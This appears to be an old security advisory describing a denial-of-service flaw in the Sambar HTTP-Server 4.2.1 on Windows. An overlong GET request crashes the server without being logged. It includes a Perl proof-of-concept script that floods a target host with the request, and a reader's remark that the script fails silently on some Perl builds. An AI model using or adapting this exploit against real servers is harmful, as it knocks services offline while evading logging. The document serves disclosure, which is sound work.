COMMAND

    sambar

SYSTEMS AFFECTED

    Win32

PROBLEM

    Dennis Conrad found following.  While testing the security of  the
    Sambar HTTP-Server he found it vulnerable to a simple DOS  attack.
    Sending a "GET  XXXX(...a lot of  Xs..)XXXX HTTP/1.0" crashes  the
    Server.    It  will   die  WITHOUT   logging  the   attack.    His
    testing-environment:

        Sambar 4.2.1
        MS IE 5.0 (de)
        Windows 95 C (de)

    Sample exploit code follows:

    #!/usr/bin/perl

    #########
    # Sample DOS against the Sambar HTTP-Server
    # This was tested against Sambar 4.2.1 running on Windows95 C
    # This attack will NOT be logged! Only use it to determine if
    # your Server is vulnerable!
    #
    # Dennis Conrad (dennis@linuxstart.com)
    #

    use IO::Socket;

    print "+++++++++\n";
    print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";
    print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n";

    if ($#ARGV != 0) {
            die "+ Please give the host address as argument\n"
    }

    opensocket ("\n");
    print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
    close $remote;

    opensocket ("\n+ The server seemed to be vulnerable to this attack\n");
    close $remote;
    die "+ The server does not seem to be vulnerable to this attack\n";

    sub opensocket {
            $remote = IO::Socket::INET->new (
                    Proto => "tcp",
                    PeerAddr => $ARGV[0],
                    PeerPort => "http(80)",
            ) || die "+ Can't open http-port on $ARGV[0]$_[0]";
            $remote->autoflush(1)
    }

    Using that  many 9s  on my  version of  Perl fails  silently.  The
    above seems equivalent to: print $remote "GET  HTTP/1.0\n\n";

        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999;'
        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;'
        Died at -e line 1.
        steve@grok:/home/steve% perl -v

        This is perl, version 5.005_03 built for i386-freebsd
        [etc.]

SOLUTION

    Nothing yet.